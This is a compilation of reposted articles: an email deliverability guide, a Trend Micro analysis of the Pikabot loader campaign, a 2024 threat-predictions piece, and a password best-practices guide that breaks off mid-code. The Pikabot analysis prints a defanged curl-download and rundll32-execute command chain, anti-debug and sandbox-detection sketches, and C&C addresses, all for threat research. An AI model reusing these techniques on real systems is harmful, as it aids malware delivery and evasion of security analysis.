You can authenticate your emails by ensuring they have the correct email headers: DKIM, SPF, and DMARC.

These 3 records prove that the emails you send are from you — the domain owner — not a random person pretending to be you.

What Are DMARC, SPF, and DKIM

In the past, you could get away without setting up these records, but Google will no longer allow you to skip this. If you’re seeing the 5.7.26 error from Gmail, you need to review your DNS records to figure out what’s missing.

Your email provider(s) will typically provide all 3 records and explain how to add them to your DNS; the examples below show the general shape of each. If you need a little more help, we have a few blog posts to help you understand what’s required.
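As a rough illustration (the domain, selector name, and report address are placeholders; your provider supplies the real values):

    TXT  example.com                        "v=spf1 include:_spf.yourprovider.com ~all"
    TXT  selector1._domainkey.example.com   "v=DKIM1; k=rsa; p=<public key from your provider>"
    TXT  _dmarc.example.com                 "v=DMARC1; p=none; rua=mailto:dmarc-reports@example.com"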

Just to add: Google also requires a PTR record, which is sometimes called forward reverse DNS, or full circle DNS.

Full circle reverse DNS lookup for PTR record

Your web host or email provider should handle the creation and management of your PTR record, but it’s worth checking that it has been set up, just to rule out any future problems. See our post on What is a PTR record? to find out more.
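One quick way to spot-check it is a reverse lookup on your sending IP, shown here with a documentation IP (substitute your own). A forward lookup on the returned hostname should point back at the same IP; that’s the “full circle”:

    $ dig -x 203.0.113.10 +short
    mail.example.com.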

Once your DNS has been set up, send a test email to AboutMy.Email, which will check your email for compliance.

4. Use the Correct From Email When Sending

The From Email is the sender email — the email address your emails appear to come from.

You should send emails from an email address at the same domain as your website. In other words, don’t authenticate your domain and send emails from a totally different account elsewhere.  Make sure everything matches.

WP Mail SMTP has settings specifically to allow you to set the from email (and the corresponding from name):

from name and from email

What about real email addresses vs fake ones? It’s good practice to avoid using noreply@domain.com (or any non-existent email address) as a From Email.

5. Send Email With TLS

When you’re sending emails through WordPress (or any other platform) using an SMTP server, you should use a provider that uses TLS to make the connection.

TLS stands for Transport Layer Security. It’s the successor to SSL and is more secure; TLS has largely replaced the older SSL protocol, and remaining SSL configurations are being phased out.

wp mail smtp host and port settings

We don’t need to go into a huge amount of detail on this. Most email providers will support TLS so you may already be using it. But it’s worth double-checking your account to make sure you’re using the latest settings.
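If you’re sending from your own code rather than a plugin, here’s a minimal Python sketch of an SMTP connection upgraded to TLS with STARTTLS. The hostname, port, and credentials are placeholders for your provider’s settings:

    import smtplib
    import ssl
    from email.message import EmailMessage

    msg = EmailMessage()
    msg["From"] = "news@example.com"
    msg["To"] = "reader@example.com"
    msg["Subject"] = "TLS test"
    msg.set_content("Sent over an encrypted connection.")

    context = ssl.create_default_context()
    with smtplib.SMTP("smtp.example.com", 587) as server:
        server.starttls(context=context)  # upgrade the connection to TLS before logging in
        server.login("news@example.com", "app-password")
        server.send_message(msg)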

6. Add Unsubscribe Links to Marketing Emails

Most businesses send transactional emails and marketing emails.

So what’s the difference?

  • Transactional emails are emails that are necessary for the normal operation of your business. Password reset emails, renewal reminders, and receipts are all transactional. These kinds of emails usually need to be delivered immediately to be effective.
  • Marketing emails are emails you send to promote your products and services. They don’t necessarily need to be sent immediately, and they are not essential for a customer.

There are 2 things to think about here.

First, marketing emails must have an unsubscribe link in the footer of the email. The link doesn’t have to be huge, but it has to be clearly visible.

Unsubscribe link example

Second, you should also make sure that your newsletters have a one-click unsubscribe link at the top.

One click unsubscribe link

In Gmail, this link triggers an instant unsubscribe popup. This is going to be important if you want to prevent your emails from being blocked in the future.

Gmail one click unsubscribe popup

The one-click unsubscribe link near the subject line is triggered by list unsubscribe headers. Your email provider should be able to add these headers for you.

If you’re not sure what to ask for, the header is the technical part of the email that we don’t normally see; here’s what it looks like:

List unsubscribe header example
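In text form, the pair of headers generally looks like this; the address and URL are placeholders, and the one-click variant is defined by RFC 8058:

    List-Unsubscribe: <mailto:unsubscribe@example.com>, <https://example.com/unsubscribe?user=123>
    List-Unsubscribe-Post: List-Unsubscribe=One-Click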

One question we’re asked a lot is this: Do transactional emails need to have unsubscribe links? They do not. However:

  • Include unsubscribe links in all marketing emails.
  • Don’t send emails that have a mixture of transactional and marketing content in them to try to get around this rule.
  • It’s OK to give people the choice of which email marketing lists they want to be subscribed to, but Google is clear that you must also provide an option to unsubscribe from all marketing emails.

7. Use Double Opt-ins Where Possible

Google recommends that everyone who sends marketing emails uses double opt-ins.

A double opt-in means that someone has to choose to join your list and confirm their choice, usually by clicking a confirmation link.

While Google won’t block emails to Gmail if you don’t use double opt-ins, the truth is that single opt-ins result in higher spam complaints. So implementing double opt-ins will keep that important spam complaint rate low.

The downside of double opt-ins is that you’ll grow your list more slowly because you will sign up fewer leads.

Recovering From a Gmail Block

If your WordPress emails are being blocked to Gmail recipients, running through this guide should help you to figure out the reason why.

  • If Google is rejecting emails from your domain because it’s missing some crucial DNS records, adding them might resolve the problem quickly.
  • If your domain or IP is on a blacklist, it’ll take longer to recover. You’ll need to earn the trust of email providers and slowly improve your domain or IP reputation.
  • Make it easy for people to leave your mailing lists and don’t send them emails they don’t want. This will reduce the likelihood of them marking emails as spam, therefore keeping your spam complaint rate low.
  • It can take time to clean up your lists, but removing people who aren’t opening your emails is a good first step. Re-engagement workflows typically unsubscribe people who aren’t responsive, helping to reduce spam complaints, and automatically unsubscribing invalid email addresses can also help.

Email providers like Brevo or SMTP.com are used to helping customers with these issues. If you’re concerned, reach out to them for advice. They may be able to change your sender IP or help you look into your bounce rates to diagnose the problem.

It’s difficult to say how long recovery will take. It depends on the reason you were blocked and the severity of the problem. Either way, prevention is always better than the cure.

If WordPress emails are not being delivered to Gmail and you can’t figure out why, our support team is standing by to help.

Fix Your WordPress Emails Now

Next, Boost Your Site Security

Improving your site’s security will help you to block malicious logins, and that will reduce the risk of people using your domain to send spam.

Check out our list of the best security plugins for WordPress to harden your security against common threats.

Ready to fix your emails? Get started today with the best WordPress SMTP plugin. If you don’t have the time to fix your emails, you can get full White Glove Setup assistance as an extra purchase, and there’s a 14-day money-back guarantee for all paid plans.

If this article helped you out, please follow us on Facebook and Twitter for more WordPress tips and tutorials.

Source :
https://wpmailsmtp.com/fix-gmail-blocking-emails/

Black Basta-Affiliated Water Curupira’s Pikabot Spam Campaign

By: Shinji Robert Arasawa, Joshua Aquino, Charles Steven Derion, Juhn Emmanuel Atanque, Francisrey Joshua Castillo, John Carlo Marquez, Henry Salcedo, John Rainier Navato, Arianne Dela Cruz, Raymart Yambot, Ian Kenefick
January 09, 2024
Read time: 8 min (2105 words)

A threat actor we track under the Intrusion set Water Curupira (known to employ the Black Basta ransomware) has been actively using Pikabot, a loader malware with similarities to Qakbot, in spam campaigns throughout 2023.

Pikabot is a type of loader malware that was actively used in spam campaigns by a threat actor we track under the Intrusion set Water Curupira in the first quarter of 2023, followed by a break at the end of June that lasted until the start of September 2023. Other researchers have previously noted its strong similarities to Qakbot, the latter of which was taken down by law enforcement in August 2023. An increase in the number of phishing campaigns related to Pikabot was recorded in the last quarter of 2023, coinciding with the takedown of Qakbot — hinting at the possibility that Pikabot might be a replacement for the latter (with DarkGate being another temporary replacement in the wake of the takedown).

Pikabot’s operators ran phishing campaigns, targeting victims via its two components — a loader and a core module — which enabled unauthorized remote access and allowed the execution of arbitrary commands through an established connection with their command-and-control (C&C) server. Pikabot is a sophisticated piece of multi-stage malware with a loader and core module within the same file, as well as a decrypted shellcode that decrypts another DLL file from its resources (the actual payload).

In general, Water Curupira conducts campaigns for the purpose of dropping backdoors such as Cobalt Strike, leading to Black Basta ransomware attacks (coincidentally, Black Basta also returned to operations in September 2023). The threat actor conducted several DarkGate spam campaigns and a small number of IcedID campaigns in the early weeks of the third quarter of 2023, but has since pivoted exclusively to Pikabot.

Pikabot, which gains initial access to its victim’s machine through spam emails containing an archive or a PDF attachment, exhibits the same behavior and campaign identifiers as Qakbot.

Figure 1. Our observations from the infection chain based on Trend’s investigation

Initial access via email

The malicious actors who send these emails employ thread-hijacking, a technique where malicious actors use existing email threads (possibly stolen from previous victims) and create emails that look like they were meant to be part of the thread to trick recipients into believing that they are legitimate. Using this technique increases the chances that potential victims would select malicious links or attachments. Malicious actors send these emails using addresses (created either through new domains or free email services) with names that can be found in original email threads hijacked by the malicious actor. The email contains most of the content of the original thread, including the email subject, but adds a short message on top directing the recipient to open the email attachment.

This attachment is either a password-protected archive ZIP file containing an IMG file or a PDF file. The malicious actor includes the password in the email message. Note that the name of the file attachment and its password vary for each email.

Figure 2. Sample email with a malicious ZIP attachment
Figure 3. Sample email with a malicious PDF attachment

The emails containing PDF files have a shorter message telling the recipient to check or view the email attachment.

The first stage of the attack

The attached archive contains a heavily obfuscated JavaScript (JS) with a file size amounting to more than 100 KB. Once executed by the victim, the script will attempt to execute a series of commands using conditional execution.

Figure 4. Files extracted to the attached archive (.zip or .img)
Figure 5. Deobfuscated JS command

The script attempts command execution using cmd.exe. If this initial attempt is unsuccessful, the script proceeds with the following steps: It echoes a designated string to the console and tries to ping a specified target using the same string. In case the ping operation fails, the script employs Curl.exe to download the Pikabot payload from an external server, saving the file in the system’s temporary directory.

Subsequently, the script will retry the ping operation. If the retry is also unsuccessful, it uses rundll32.exe to execute the downloaded Pikabot payload (now identified as a .dll file) with “Crash” as the export parameter. The sequence of commands concludes by exiting the script with the specified exit code, ciCf51U2FbrvK.
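Put together, the deobfuscated logic is roughly equivalent to the following defanged sketch. It is reconstructed from the behavior described above rather than taken verbatim from the script; the echoed string, server, and file name are placeholders, and cmd.exe’s || operator runs the right-hand command only when the left-hand one fails:

    echo <string> & ping <string> || curl hxxp://<server>/<payload> -o %TEMP%\<payload>.dll
    ping <string> || rundll32 %TEMP%\<payload>.dll,Crash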

We were able to observe another attack chain where the malicious actors implemented a more straightforward attempt to deliver the payload. As before, similar phishing techniques were performed to trick victims into downloading and executing malicious attachments. In this case, password-protected archive attachments were deployed, with the password contained in the body of the email.

However, instead of a malicious script, an IMG file was extracted from the attachment. This file contained two additional files — an LNK file posing as a Word document and a DLL file, which turned out to be the Pikabot payload extracted straight from the email attachment:

Figure 6. The content of the IMG file

Contrary to the JS file observed earlier, this chain maintained its straightforward approach even during the execution of the payload.

Once the victim is lured into executing the LNK file, rundll32.exe will be used to run the Pikabot DLL payload using an export parameter, “Limit”.

The content of the PDF file is disguised to look like a file hosted on Microsoft OneDrive to convince the recipient that the attachment is legitimate. Its primary purpose is to trick victims into accessing the PDF file content, which is a link to download malware.

Figure 7. Malicious PDF file disguised to look like a OneDrive attachment; note the misspelling of the word “Download”

When the user clicks the download button, the file attempts to access a malicious URL and then proceeds to download a malicious JS file (possibly similar to the previously mentioned JS file).

The delivery of the Pikabot payload via PDF attachment is a more recent development, emerging only in the fourth quarter of 2023.

We discovered an additional variant of the malicious downloader that employed obfuscation methods involving array usage and manipulation:

Figure 8. Elements of array “_0x40ee” containing download URLs and JS methods used for further execution

Nested functions employed array manipulation methods using "push" and "shift," introducing complexity to the code's structure and concealing its flow to hinder analysis. The multiple download URLs, the dynamic creation of random directories using the mkdir command, and the use of Curl.exe, as observed in the preceding script, are all encapsulated within yet another array.

The JavaScript will run multiple commands in an attempt to retrieve the malicious payload from different external websites using Curl.exe, subsequently storing it in a random directory created using mkdir.

Figure 9. Payload retrieval commands using curl.exe

The rundll32.exe file will continue to serve as the execution mechanism for the payload, incorporating its export parameter.

Figure 10. Payload execution using rundll32.exe

The Pikabot payload

We analyzed the DLL file extracted from the archive shown in Figure 6 and found it to be a 32-bit DLL with 1,515 exports. When its export function "Limit" is called, the file decrypts and executes a shellcode that determines whether the process is being debugged by calling the Windows API NtQueryInformationProcess twice: with the flag 0x7 (ProcessDebugPort) on the first call and 0x1F (ProcessDebugFlags) on the second. This shellcode also decrypts another DLL file, which it loads into memory and eventually executes.

Figure 11. The shellcode calling the entry point of the decrypted DLL file
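
The two queries described above are a well-documented anti-debug idiom. The following self-contained Python sketch runs the same checks against its own process via ctypes; it is a benign reconstruction for illustration, not Pikabot's code.

```python
# Benign, self-checking sketch of the documented anti-debug queries (Windows).
import ctypes
from ctypes import wintypes

ntdll = ctypes.WinDLL("ntdll")
CURRENT_PROCESS = wintypes.HANDLE(-1)  # the pseudo-handle GetCurrentProcess returns

ProcessDebugPort = 0x7    # first call made by the shellcode
ProcessDebugFlags = 0x1F  # second call

def query(info_class: int, buf) -> bool:
    """NtQueryInformationProcess on our own process; True on NTSTATUS success."""
    ret_len = wintypes.ULONG(0)
    status = ntdll.NtQueryInformationProcess(
        CURRENT_PROCESS, info_class,
        ctypes.byref(buf), ctypes.sizeof(buf), ctypes.byref(ret_len))
    return status == 0

port = ctypes.c_void_p(0)   # DebugPort is pointer-sized
flags = wintypes.ULONG(0)   # DebugFlags is a 32-bit value

debugged = (query(ProcessDebugPort, port) and bool(port.value)) or \
           (query(ProcessDebugFlags, flags) and flags.value == 0)
print("debugger detected:", debugged)
```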

The decrypted DLL file executes another anti-analysis routine, loading incorrect libraries and other junk entries in order to detect sandboxes. This routine appears to have been copied from a certain GitHub article.

Security/Virtual Machine/Sandbox DLL files    Real DLL files        Fake DLL files
cmdvrt.32.dll                                 kernel32.dll          NetProjW.dll
cmdvrt.64.dll                                 networkexplorer.dll   Ghofr.dll
cuckoomon.dll                                 NlsData0000.dll       fg122.dll
pstorec.dll
avghookx.dll
avghooka.dll
snxhk.dll
api_log.dll
dir_watch.dll
wpespy.dll

Table 1. The DLL files loaded to detect sandboxes
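
A generic Python sketch of the technique in Table 1 follows: it asks the Windows loader for each name and treats a successful load of a hooking DLL, or of a made-up "fake" DLL that no real system should resolve, as a sandbox signal. This reconstructs the idea only; it is not Pikabot's implementation.

```python
# Generic sandbox probe based on the DLL names in Table 1 (Windows).
import ctypes

SANDBOX_DLLS = ["cmdvrt.32.dll", "cmdvrt.64.dll", "cuckoomon.dll", "pstorec.dll",
                "avghookx.dll", "avghooka.dll", "snxhk.dll", "api_log.dll",
                "dir_watch.dll", "wpespy.dll"]   # injected by analysis tools
FAKE_DLLS = ["NetProjW.dll", "Ghofr.dll", "fg122.dll"]  # should never resolve

def loads(name: str) -> bool:
    try:
        ctypes.WinDLL(name)
        return True
    except OSError:
        return False

hooked = [d for d in SANDBOX_DLLS if loads(d)]   # real hooking DLLs present
faked = [d for d in FAKE_DLLS if loads(d)]       # a sandbox faking LoadLibrary
print("sandbox indicators:", (hooked + faked) or "none")
```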

After performing the anti-analysis routine, the malware loads a set of PNG images from its resources section, each of which contains an encrypted chunk of the core module, and decrypts them. Once the core payload has been decrypted, the Pikabot injector creates a suspended process (%System%\SearchProtocolHost) and injects the core module into it. The injector uses indirect system calls to hide the injection.

Figure 12. Loading the PNG images to build the core module

Resolving the necessary APIs is among the malware's initial actions. Using a hash of each API name (0xF4ACDD8, 0x03A5AF65E, and 0xB1D50DE4), Pikabot uses two functions to obtain the addresses of the three APIs it needs: GetProcAddress, LoadLibraryA, and HeapFree. It does this by walking through the exports of kernel32.dll. The rest of the APIs it uses are resolved with GetProcAddress and decrypted strings. Other pertinent strings are likewise decrypted at runtime just before they are used.

Figure 13. Harvesting the GetProcAddress and LoadLibrary API

The Pikabot core module checks the system's language settings and stops executing if the language is any of the following:

  • Russian (Russia)
  • Ukrainian (Ukraine)

It will then ensure that only one instance of itself is running by creating a hard-coded mutex, {A77FC435-31B6-4687-902D-24153579C738}.
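
Creating a named mutex like this is the standard Windows single-instance pattern. The ctypes sketch below demonstrates the mechanism with the hard-coded name quoted above; it is illustrative only.

```python
# Single-instance guard via a named mutex (Windows).
import ctypes
import sys

ERROR_ALREADY_EXISTS = 183
MUTEX_NAME = "{A77FC435-31B6-4687-902D-24153579C738}"  # the name quoted above

kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
kernel32.CreateMutexW(None, False, MUTEX_NAME)
if ctypes.get_last_error() == ERROR_ALREADY_EXISTS:
    sys.exit("another instance is already running")
print("first instance; the mutex is held until the process exits")
```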

The next stage of the core module involves obtaining details about the victim's system and forwarding them to a C&C server. The collected data is formatted as JSON, with every data item filled in using the wsprintfW function. Before encryption, the stolen data looks like the image in Figure 14:

Figure 14. Stolen information in JSON format before encryption

Pikabot seems to have a binary version and a campaign ID. The keys 0fwlm4g and v2HLF5WIO are present in the JSON data, with the latter seemingly being a campaign ID.

The malware creates a named pipe and uses it to temporarily store the additional information gathered by creating the following processes: 

  • whoami.exe /all
  • ipconfig.exe /all
  • netstat.exe -aon

Each piece of information returned will be encrypted before the execution of the process.

A list of running processes on the system is also gathered and encrypted by calling CreateToolhelp32Snapshot and enumerating processes through Process32First and Process32Next.

Once all the information is gathered, it will be sent to one of the following IP addresses appended with the specific URL, cervicobrachial/oIP7xH86DZ6hb?vermixUnintermixed=beatersVerdigrisy&backoff=9zFPSr: 

  • 70[.]34[.]209[.]101:13720
  • 137[.]220[.]55[.]190:2223
  • 139[.]180[.]216[.]25:2967
  • 154[.]61[.]75[.]156:2078
  • 154[.]92[.]19[.]139:2222
  • 158[.]247[.]253[.]155:2225
  • 172[.]233[.]156[.]100:13721

However, as of this writing, these sites are inaccessible.

C&C servers and impact

As previously mentioned, Water Curupira conducts campaigns to drop backdoors such as Cobalt Strike, which lead to Black Basta ransomware attacks. It is this potential association with a sophisticated ransomware family such as Black Basta that makes Pikabot campaigns particularly dangerous.

The threat actor also conducted several DarkGate spam campaigns and a small number of IcedID campaigns during the early weeks of the third quarter of 2023, but has since pivoted exclusively to Pikabot.

Lastly, we have observed distinct clusters of Cobalt Strike beacons with over 70 C&C domains leading to Black Basta, all dropped via campaigns conducted by this threat actor.

Security recommendations

To avoid falling victim to various online threats such as phishing, malware, and scams, users should stay vigilant when it comes to emails they receive. The following are some best practices in user email security:

  • Always hover over embedded links with the pointer to learn where the link leads.
  • Check the sender’s identity. Unfamiliar email addresses, mismatched email and sender names, and spoofed company emails are signs that the sender has malicious intent.
  • If the email claims to come from a legitimate company, verify both the sender and the email content before downloading attachments or selecting embedded links.
  • Keep operating systems and all pieces of software updated with the latest patches.
  • Regularly back up important data to an external and secure location. This ensures that even if you fall victim to a phishing attack, you can restore your information.

A multilayered approach can help organizations guard possible entry points into their system (endpoint, email, web, and network). Security solutions can detect malicious components and suspicious behavior, which can help protect enterprises.  

  • Trend Vision One™ provides multilayered protection and behavior detection, which helps block questionable behavior and tools before ransomware can do any damage. 
  • Trend Cloud One™ – Workload Security protects systems against both known and unknown threats that exploit vulnerabilities. This protection is made possible through techniques such as virtual patching and machine learning.  
  • Trend Micro™ Deep Discovery™ Email Inspector employs custom sandboxing and advanced analysis techniques to effectively block malicious emails, including phishing emails that can serve as entry points for ransomware.  
  • Trend Micro Apex One™ offers next-level automated threat detection and response against advanced concerns such as fileless threats and ransomware, ensuring the protection of endpoints.

Indicators of Compromise (IOCs)

The indicators of compromise for this blog entry can be found here.

Source :
https://www.trendmicro.com/it_it/research/24/a/a-look-into-pikabot-spam-wave-campaign.html

Forward Momentum: Key Learnings From Trend Micro’s Security Predictions for 2024

By: Trend Micro
December 06, 2023
Read time: 4 min (971 words)

In this blog entry, we discuss predictions from Trend Micro’s team of security experts about the drivers of change that will figure prominently in 2024.

Digital transformations in the year ahead will be led by organizations pursuing a pioneering edge from the integration of emergent technologies. Advances in cloud technology, artificial intelligence and machine learning (AI/ML), and Web3 are poised to reshape the threat landscape, giving it new frontiers outside the purview of traditional defenses. However, these technological developments are only as efficient as the IT structures that support them. In 2024, business leaders will have to take measures to ensure that their organization’s systems and processes are equipped to stay in step with these modern solutions — not to mention the newfound security challenges that come with implementing and securing them.

As the new year draws closer, decision-makers will need to stay on top of key trends and priority areas in enterprise cybersecurity if they are to make room for growth and fend off any upcoming threats along their innovation journey. In this blog entry, we discuss predictions from Trend Micro’s team of security experts about the drivers of change that will figure prominently next year.

Misconfigurations will allow cybercriminals to scale up their attacks using cloud-native worms

Enterprises should come into 2024 prepared to ensure that their cloud resources can’t be turned against them in “living-off-the-cloud” attacks. Security teams need to closely monitor cloud environments in anticipation of cyberattacks that, tailored with worming capabilities, can also abuse cloud misconfigurations to gain a foothold in their targets and use rootkits for persistence. Cloud technologies like containerized applications are especially at risk since, once infected, they can serve as a launchpad from which attackers can spread malicious payloads to other accounts and services. Given their ability to infect multiple containers at once, leverage vulnerabilities at scale, and automate various tasks like reconnaissance, exploitation, and achieving persistence, worms will endure as a prominent tactic among cybercriminals next year.

AI-generated media will give rise to more sophisticated social engineering scams

The gamut of use cases for generative AI will be a boon not only for enterprises but also for fraudsters seeking new ways of profiteering in 2024. Though they’re often behind the curve when it comes to new technologies, expect cybercriminals — swayed by the potential of lucrative pay — to incorporate AI-generated lures as part of their upgraded social engineering attacks. Notably, despite the shutdown of malicious large language model (LLM) tool WormGPT, similar tools could still emerge from the dark web. In the interim, cybercriminals will also continue to find other ways to circumvent the limitations of legitimate AI tools available online. In addition to their use of digital impostors that combine various AI-powered tools in emerging threats like virtual kidnapping, we predict that malicious actors will resort specifically to voice cloning in more targeted attacks.

The rising tide of data poisoning will be a scourge on ML models under training

Integrating machine-learning (ML) models into their operations promises to be a real game changer for businesses that are banking on the potential of these models to supercharge innovation and productivity. As we step into 2024, attempts to corrupt the training data of these models will start gaining ground. Threat actors will likely carry out these attacks by taking advantage of a model’s data-collection phase or by compromising its data storage or data pipeline infrastructure. Specialized models using focused datasets will also be more vulnerable to data poisoning than LLMs and generative AI models trained on extensive datasets, which will prompt security practitioners to pay closer attention to the risks associated with tapping into external resources for ML training data.

Attackers will take aim at software supply chains through their CI/CD pipelines

Software supply chains will have a target on their back in 2024, as cybercriminals will aim to infiltrate them through their continuous integration and delivery (CI/CD) systems. For example, despite their use in expediting software development, components and code sourced from third-party libraries and containers are not without security risks, such as lacking thorough security audits, containing malicious or outdated components, or harboring overlooked vulnerabilities that could open the door to code-injection attacks. The call for developers to be wary of anything sourced from third parties will therefore remain relevant next year. Similarly, to safeguard the resilience of critical software development pipelines and weed out bugs in the coming year, DevOps practitioners should exercise caution and conduct routine scans of any external code they plan to use.

New extortion schemes and criminal gangs will be built around the blockchain

Whereas public blockchains are hardened by continuous cyberattacks, the same can’t be said of their permissioned counterparts because of the latter’s centralized nature. This lack of hard-won resilience will drive malicious actors to develop new extortion business models specific to private blockchains next year. In such extortion operations, criminals could use stolen keys to insert malicious data or modify existing records on the blockchain and then demand a payoff to stay mum on the attack. Threat actors can also strong-arm their victims into paying the ransom by wresting control of enough nodes to encrypt an entire private blockchain. As for criminal groups, we predict that 2024 will see the debut of the first criminal organizations running entirely on blockchains, governed by smart contracts or decentralized autonomous organizations (DAOs).

Countering future cyberthreats

Truly transformative technologies inevitably cross the threshold into standard business operations. But as they make that transition from novel to industry norm, newly adopted tools and solutions require additional layers of protection if they are to contribute to an enterprise’s expansion. So long as their security stance is anchored on preparedness and due diligence, organizations stand to reap the benefits from a growing IT stack without exposing themselves to unnecessary risks. To learn more about the key security considerations and challenges that lie ahead for organizations and end users, read our report, “Critical Scalability: Trend Micro Security Predictions for 2024.”

Source :
https://www.trendmicro.com/it_it/research/23/l/forward-momentum–key-learnings-from-trend-micro-s-security-pred.html

The Ultimate Guide to Password Best Practices: Guarding Your Digital Identity

Dirk Schrader
Published: November 14, 2023
Updated: November 24, 2023

In the wake of escalating cyber-attacks and data breaches, the ubiquitous advice of “don’t share your password” is no longer enough. Passwords remain the primary keys to our most important digital assets, so following password security best practices is more critical than ever. Whether you’re securing email, networks, or individual user accounts, following password best practices can help protect your sensitive information from cyber threats.

Read this guide to explore password best practices that should be implemented in every organization — and learn how to protect vulnerable information while adhering to better security strategies.

The Secrets of Strong Passwords

A strong password is your first line of defense when it comes to protecting your accounts and networks. Implement these standard password creation best practices when thinking about a new password:

  • Complexity: Ensure your passwords contain a mix of uppercase and lowercase letters, numbers, and special characters. Note, however, that NIST no longer recommends mandatory composition rules (required lowercase, symbols, and so on), so apply them at your own discretion.
  • Length: Longer passwords are generally stronger, and length usually trumps complexity. Aim for at least 12 characters; NIST's required minimum is 8.
  • Unpredictability: Avoid common phrases, predictable patterns, and easily guessable information like birthdays or names. Instead, create unique strings that are difficult for attackers to guess.


Combining these factors makes passwords harder to guess. For instance, if a password is 8 characters long and is drawn from uppercase letters, lowercase letters, numbers, and roughly 30 special characters, the total number of possible combinations is (26 + 26 + 10 + 30)^8, or about 5.1 × 10^15. This astronomical number of possibilities makes it exceedingly difficult for an attacker to guess the password.
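
The arithmetic is easy to verify; the sketch below also adds a brute-force time estimate under the assumption (mine, for illustration) of one billion guesses per second:

```python
# Password search-space arithmetic from the paragraph above.
pool = 26 + 26 + 10 + 30       # upper + lower + digits + ~30 specials = 92 symbols
combos = pool ** 8             # all possible 8-character passwords
print(f"{combos:.2e} combinations")        # ~5.13e+15

guesses_per_second = 1e9                   # assumed attacker speed
days = combos / guesses_per_second / 86400
print(f"~{days:.0f} days to exhaust the space")   # ~59 days
# Each extra character multiplies the work by 92; at 12 characters the same
# attacker would need on the order of ten million years.
```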

Of course, given NIST’s updated guidance on passwords, the best approach to effective password security is using a password manager — this solution will not only help create and store your passwords, but it will automatically reject common, easy-to-guess passwords (those included in password dumps). Password managers greatly increase security against the following attack types.

Password-Guessing Attacks

Understanding the techniques that adversaries use to guess user passwords is essential for password security. Here are some of the key attacks to know about:

Brute-Force Attack

In a brute-force attack, an attacker systematically tries every possible combination of characters until the correct password is found. This method is time-consuming but can be effective if the password is weak.

Strong passwords help thwart brute force attacks because they increase the number of possible combinations an attacker must try, making it unlikely they can guess the password within a reasonable timeframe.

Dictionary Attack

A dictionary attack is a type of brute-force attack in which an adversary uses a list of common words, phrases and commonly used passwords to try to gain access.

Unique passwords are essential to thwarting dictionary attacks because attackers rely on common words and phrases. Using a password that isn’t a dictionary word or a known pattern significantly reduces the likelihood of being guessed. For example, the string “Xc78dW34aa12!” is not in the dictionary or on the list of commonly used passwords, making it much more secure than something generic like “password.”

Dictionary Attack with Character Variations

In some dictionary attacks, adversaries use standard words but also try common character substitutions, such as replacing ‘a’ with ‘@’ or ‘e’ with ‘3’. For example, in addition to trying to log on using the word “password”, they might also try the variant “p@ssw0rd”.

Choosing complex and unpredictable passwords is necessary to thwart these attacks. By using unique combinations and avoiding easily guessable patterns, you make it challenging for attackers to guess your password.
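
To see how little such substitutions add, the sketch below enumerates every variant of "password" under a small substitution map; the map is an illustrative assumption, not any particular cracking tool's rule set:

```python
# Enumerate common character-substitution variants of a dictionary word.
from itertools import product

SUBS = {"a": "a@", "e": "e3", "i": "i1", "o": "o0", "s": "s$5"}  # assumed map

def variants(word: str):
    pools = [SUBS.get(c, c) for c in word.lower()]
    for combo in product(*pools):
        yield "".join(combo)

print(len(list(variants("password"))))  # only 36 candidates, "p@ssw0rd" among them
```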

How Password Managers Enhance Security

Password managers are indispensable for securely storing and organizing your passwords. These tools offer several key benefits:

  • Security: Password managers store passwords and enter them for you, eliminating the need for users to remember them all. All users need to remember is the master password for their password manager tool. Therefore, users can use long, complex passwords as recommended by best practices without worrying about forgetting their passwords or resorting to insecure practices like writing passwords down or reusing the same password for multiple sites or applications.
  • Password generation: Password managers can generate a strong and unique password for each user account, eliminating the need for individuals to come up with them (a minimal generation sketch follows this list).
  • Encryption: Password managers encrypt password vaults, ensuring the safety of data — even if it is compromised.
  • Convenience: Password managers enable users to easily access passwords across multiple devices.
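
As a rough illustration of the generation point above, Python's standard secrets module can produce a cryptographically random password; the length and alphabet below are arbitrary choices, not any vendor's defaults:

```python
# Generate a cryptographically random password with the standard library.
import secrets
import string

ALPHABET = string.ascii_letters + string.digits + string.punctuation

def generate_password(length: int = 16) -> str:
    """Assemble a password from cryptographically secure random choices."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

print(generate_password())  # different on every run
```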

When selecting a password manager, it’s important to consider your organization’s specific needs, such as support for the platforms you use, price, ease of use and vendor breach history. Conduct research and read reviews to identify the one that best aligns with your organization’s requirements. Some noteworthy options include Netwrix Password Secure, LastPass, Dashlane, 1Password and Bitwarden.

How Multifactor Authentication (MFA) Adds an Extra Layer of Security

Multifactor authentication strengthens security by requiring two or more forms of verification before granting access. Specifically, you need to provide at least two of the following authentication factors:

  • Something you know: The classic example is your password.
  • Something you have: Usually this is a physical device like a smartphone or security token.
  • Something you are: This is biometric data like a fingerprint or facial recognition.

MFA renders a stolen password worthless, so implement it wherever possible.

Password Expiration Management

Password expiration policies play a crucial role in maintaining strong password security, and using a password manager that creates strong passwords reduces how often passwords need to change. If you do not use a password manager yet, implement a strategy to check all passwords within your organization: with the rise in data breaches, the password lists used in brute-force attacks (such as the well-known rockyou.txt and its variations) are constantly growing. The website haveibeenpwned.com offers a service for checking whether a given password has been exposed (a minimal sketch of such a check follows the list below). Here’s what users should know about password security best practices related to password expiration:

  • Follow policy guidelines: Adhere to your organization’s password expiration policy. This includes changing your password when prompted and selecting a new, strong password that meets the policy’s requirements.
  • Set reminders: If your organization doesn’t enforce password expiration via notifications, set your own reminders to change your password when it’s due. Regularly check your email or system notifications for prompts.
  • Avoid obvious patterns: When changing your password, refrain from using variations of the previous one or predictable patterns like “Password1,” “Password2” and so on.
  • Report suspicious activity: If you notice any suspicious account activity or unauthorized password change requests, report them immediately to your organization’s IT support service or helpdesk.
  • Be cautious with password reset emails: Best practice for good password security means being aware of scams. If you receive an unexpected email prompting you to reset your password, verify its authenticity. Phishing emails often impersonate legitimate organizations to steal your login credentials.
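
The exposure check mentioned above can be sketched against the public Have I Been Pwned range API; its k-anonymity design means only the first five characters of the password's SHA-1 hash ever leave your machine:

```python
# Check a password against the Have I Been Pwned k-anonymity range API.
import hashlib
import urllib.request

def pwned_count(password: str) -> int:
    """Return how many times the password appears in known breach corpora."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    prefix, suffix = digest[:5], digest[5:]
    url = f"https://api.pwnedpasswords.com/range/{prefix}"
    with urllib.request.urlopen(url) as resp:
        body = resp.read().decode()
    for line in body.splitlines():
        candidate, _, count = line.partition(":")
        if candidate == suffix:
            return int(count)
    return 0

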